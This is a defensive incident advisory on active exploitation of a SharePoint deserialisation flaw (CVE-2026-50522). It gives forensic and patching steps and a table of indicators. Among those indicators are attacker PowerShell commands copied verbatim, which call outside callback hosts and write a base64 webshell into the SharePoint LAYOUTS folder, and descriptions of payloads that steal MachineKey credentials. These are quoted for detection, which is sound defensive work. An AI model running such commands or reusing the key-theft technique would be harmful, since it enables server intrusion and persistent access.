Last Updated: 2026-07-25T12:48:20Z
What’s Happening
Microsoft SharePoint Remote Code Execution Vulnerability CVE-2026-50522 is actively exploited in the wild since 2026-07-17T00:00:00Z. This is an unauthenticated deserialisation vulnerability. A public proof-of-concept has been available since 2026-07-20T05:53:56Z. A patch is available since 2026-07-14T00:00:00Z (Patch Tuesday).
Actions
-
Collect forensic evidence including but not limited to Windows Event logs, AV/EDR logging, IIS Webserver logging, firewall logging. Make a memory snapshot and consider disk snapshots. Collect logging going back to at least 2026-07-17T00:00:00Z.
-
Update Microsoft SharePoint servers to a patched version (July 2026 or later) or limit external access until a patch is applied. Reboot SharePoint servers after updating.
-
Rotate all MachineKey/ValidationKey credentials on SharePoint servers and consider enabling automatic MachineKey rotation.
-
Check collected forensic evidence for suspicious activity.
- Look for HTTP requests with method
POST, URI path’s/_trust/default.aspx,/_windows/default.aspxand status code500as indicator of (attempted) exploitation. This can include False Positives. - Look for process creation events for suspicious processes like
powershell.exespawning from the SharePoint worker processw3wp.exe. Note that deserialisation attacks do not require a process creation to be successful. - Look for outbound network connections from (child processes of) SharePoint worker process
w3wp.exe. - Look for newly created executable files in SharePoint webroot directories, including directories such as
\TEMPLATE\LAYOUTS\.
- Look for HTTP requests with method
-
Continue with incident response with suspicious activity is identified, or start with recovery.
Indicators of Compromise (IOC’s)
All valid from 2026-07-17T00:00:00Z until 2026-07-31T00:00:00Z (estimate).
| Indicator | Indicator type | Comments |
|---|---|---|
/_trust/default.aspx |
URI Path | Exploited URI path via POST request with malicious cookie value |
/_windows/default.aspx |
URI Path | Exploited URI path via POST request with malicious cookie value |
/_layouts/layout2sp.aspx |
URI Path | Webshell URI that returns MachineKey. Associated with 199.91.221.54 |
/_layouts/15/cm*.aspx |
URI path | Webshell “Helper Tool” URI. Associated with 165.154.199.52 |
103.114.161.6 |
ipv4-addr | Exploit source. AS142036 Hosteons Pte. Ltd. |
146.19.216.119 |
ipv4-addr | Exploit source. AS134677 Dromatics Systems Pte Ltd. |
77.110.123.40 |
ipv4-addr | Exploit source and callback IP. AS203273 NetCrafters OU |
149.102.254.84 |
ipv4-addr | Exploit source. AS212238 Datacamp Limited. VPN? |
199.91.221.54 |
ipv4-addr | Exploit source. AS399629 BL Networks. User-Agents vary. |
45.63.58.216 |
ipv4-addr | Exploit source and callback IP. AS20473 Vultr |
149.40.49.54 |
ipv4-addr | Exploit source. AS212238 Datacamp Limited. Clever HEAD only truc, to avoid spilling to payload to low-interaction honeypots. |
107.191.46.42 |
ipv4-addr | Exploit source. AS20473 Vultr |
103.138.13.175 |
ipv4-addr | Exploit source. AS138195 MOACK.Co.LTD |
162.211.231.102 |
ipv4-addr | Exploit source. AS25820 IT7 Networks Inc |
104.248.220.253 |
ipv4-addr | Exploit source. AS14061 DigitalOcean |
206.189.199.39 |
ipv4-addr | Exploit source. AS14061 DigitalOcean |
138.68.51.132 |
ipv4-addr | Exploit source. AS14061 DigitalOcean |
134.122.43.198 |
ipv4-addr | Exploit source. AS14061 DigitalOcean |
194.195.125.182 |
ipv4-addr | Exploit source. AS63949 Linode |
134.209.92.223 |
ipv4-addr | Exploit source. AS14061 DigitalOcean |
172.237.53.104 |
ipv4-addr | Exploit source. AS63949 Linode |
168.144.176.24 |
ipv4-addr | Exploit source. AS14061 DigitalOcean |
137.184.184.209 |
ipv4-addr | Exploit source. AS14061 DigitalOcean |
151.243.137.78 |
ipv4-addr | Exploit source. AS212238 Datacamp Limited |
185.122.186.177 |
ipv4-addr | Attack source. AS174 EDIS |
89.117.94.35 |
ipv4-addr | Exploit source. AS46475 Limestone Networks |
155.138.207.22 |
ipv4-addr | Exploit source. AS20473 Vultr |
165.154.199.52 |
ipv4-addr | Exploit source. AS142002 Scloud Pte Ltd |
195.160.223.50 |
ipv4-addr | Expoit source. AS43641 SOLLUTIUM EU Sp z.o.o. |
178.131.136.213 |
ipv4-addr | Expoit source. AS50810 Mobin Net Communication Company (mci.ir) |
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.7417 |
HTTP Request header User-Agent | Associated with 149.102.254.84 |
python-requests/2.34.2 |
HTTP Request header User-Agent | Associated with 45.63.58.216, 178.131.136.213 |
python-requests/2.32.5 |
HTTP Request header User-Agent | Associated with 155.138.207.22 |
curl/8.19.0 |
HTTP Request header User-Agent | Associated with 149.102.254.84 |
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 |
HTTP Request header User-Agent | Associated with 45.63.58.216, 178.131.136.213, 195.160.223.50 |
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.33158 |
HTTP Request header User-Agent | Associated with 45.63.58.216 and 146.19.216.119 |
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 |
HTTP Request Header user-agent | Associated with 162.211.231.102 |
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.4294 |
HTTP Request Header user-agent | Associated with 149.40.49.54 |
python-requests/2.31.0 |
HTTP Request Header user-agent | Associated with 107.191.46.42, 89.117.94.35, 77.110.123.40 |
Python-urllib/3.13 |
HTTP Request Header user-agent | Associated with 103.138.13.175 |
Mozilla/5.0 |
HTTP Request Header user-agent | Associated with 104.248.220.253, 206.189.199.39, 138.68.51.132, 134.122.43.198, 194.195.125.182, 134.209.92.223, 151.243.137.78 |
Mozilla/5.0 (Windows NT; Windows NT 10.0; zh-TW) WindowsPowerShell/5.1.26100.7462 |
HTTP Request header User-Agent | Associated with 185.122.186.177 |
46e5aedd0e699bf0a3ad8f8cd67d79b51d65ce77e02ff96a49617d5c8c3fe4d7 |
file SHA-256 | tyt0qmyy.dll .NET deserialisation payload. Returns the HTTP response header sec-ch-ua-mobile: ?1 on succesfull exploitation. |
7baf220eb89f2a216fcb2d0e9aa021b2a10324f0641caf8b7a9088e4e45bec95 |
file SHA-256 | Main.dll .NET deserialisation payload. Returns the MachineKey and related configuration options in the response body. Associated with 146.19.216.119. Snippet code: current.Response.Write(machineKeySection.ValidationKey [SNIP] |
91d18bcd4532c7f64a220ca65971e2a41d435148e4ac9811bfc33d2a8fb70549 |
file SHA-256 | edm3ysnc.dll .NET payload to return MachineKeys. Quite elaborate MyPayloadClass which supports logic to differentiate based on ValidationKey and CompatabilityMode settings. Returns values in-band using response headers X-CM, X-VA, X-DA, X-AG, X-VK, X-DK. Associated with 103.138.13.175 and 162.211.231.102. |
afce3e097f06e1c5e4dd3422dd7ebc6615a94b111a8b7ab5333071fbb1ecbb35 |
file SHA-256 | bwd0vdqa.dll .NET payload to return MachineKeys. Quite elaborate with support logic to differentiate based on ValidationKey and CompatabilityMode settings. Returns values in-band in response body in the following format: <pre>Hostname:" + Environment.MachineName + "\n [SNIP]. Associated with 134.122.43.198, 172.237.53.104 and likely the entire DigitalOcean/Linode cluster. |
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://45.63.58.216:80/a5b622958d834e46bb7166ac8588098f' |
text | Powershell command associated with 45.63.58.216. |
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://77.110.123.40/check' |
text | Powershell command associated with 77.110.123.40. |
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://77.110.123.40/spse-cookie-rce-37a3b0e647a34e189221755146afb4d7' |
text | Powershell command associated with 149.102.254.84 |
powershell -nop -c "[IO.File]::WriteAllBytes('C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\TEMPLATE\\LAYOUTS\\layout2sp.aspx',[Convert]::FromBase64String('PCVAI[SNIP]wdD4='))" |
text | Powershell command to write a webshell to layout2sp.aspx. Associated with 199.91.221.54. |
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://x20byil6hgjjlg59mbf3v6bis9y0mqaf.oastify.com/spse-cookie-rce-80b348691f224a01bf560c08be177241 |
text | Powershell payload with Out-of-band Application Security (OAST) callback domain oastify.com (Portswigger Burpsuite). Associated with 185.122.186.177 |
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://t60595apww0ch4o1j4hmmhs5qwwnkg85.oastify.com |
text | Powershell payload with Out-of-band Application Security (OAST) callback domain oastify.com (Portswigger Burpsuite). Associated with `178.131.136.213 |
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://wrr8u8vshzlf2794472p7kd8bzhq5lta.oastify.com |
text | Powershell payload with Out-of-band Application Security (OAST) callback domain oastify.com (Portswigger Burpsuite). Associated with 195.160.223.50 |
352e47e996a1b43250a4462fa259e12b1fee726abe1be42f1806b30be9459151 |
file SHA-256 | jflyahz3.dll .NET payload to retreive MachineKey credentials. Returns headers X-NetVersion, X-ValidationKey, X-ValidationAlg, X-DecryptionKey, X-DecryptionAlg, X-CompatibilityMode, X-MasterValidationKey, X-MasterDecryptionKey, X-AppName, X-AppId, X-AutoValidationKey, X-AutoDecryptionKey, X-AppIdSpecificValidationKey, X-AppIdSpecificDecryptionKey, X-Err. Associated with 89.117.94.35 |
8bd04f0213c39f07c4baa283375017463e20642545a6fefcbcb6d792c7ee6d9d |
file SHA-256 | 14e2gtsh.dll .NET payload to retrieve MachineKeys. Code snippet: `current.Response.Write("STARThN: " + hostName + " |
02fe5d24867227cb4bff7d3f019d804a19158e3de1de0729fdd067aae55b0bbd |
file SHA-256 | eze1fcmh.dll .NET payload for webshell/backdoor 450839ecab9cb5595b4f6088e7b16d7ea3a5289f2afcc7ae89c041ae046e2511. Associated with 165.154.199.52 |
824052c860945c1bda536f20318429240319f4f59bc4cf8740a0d6bffe2b9966 |
file SHA-256 | b4tg4ktk.dll .NET payload to retrieve MachineKeys in-band. Returns status code 200. |
C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\layout2sp.aspx |
file location | Webshell that returns MachineKey credentials. Associated with 199.91.221.54. |
d7ba3ef04a5809d6c672a13bbd7d6a3fc6317faeefbae98bec437ade0475a597 |
file SHA-256 | Webshell layout2sp.aspx associated with 199.91.221.54 |
450839ecab9cb5595b4f6088e7b16d7ea3a5289f2afcc7ae89c041ae046e2511 |
file SHA-256 | Webshell “Helper Tool” and filename cmRANDOM.aspx. Executed payloads are executed in-memory using Assembly.Load(assemblyBytes). The filename is randomised. Associated with 165.154.199.52. |
Notes
- An undocumented SharePoint deserialization vector is being exploited on our honeypots during the current SharePoint CVE wave. | Defused
- Critical SharePoint RCE flaw exploited to steal machine keys | Bleeping Computer
- Exploitation Alert: watchTowr is observing active exploitation of CVE-2026-50522 against on-premise Microsoft SharePoint deployments following the release of public exploit code, with attackers stealing machine keys to retain long-term access. | WatchTowr on Linkedin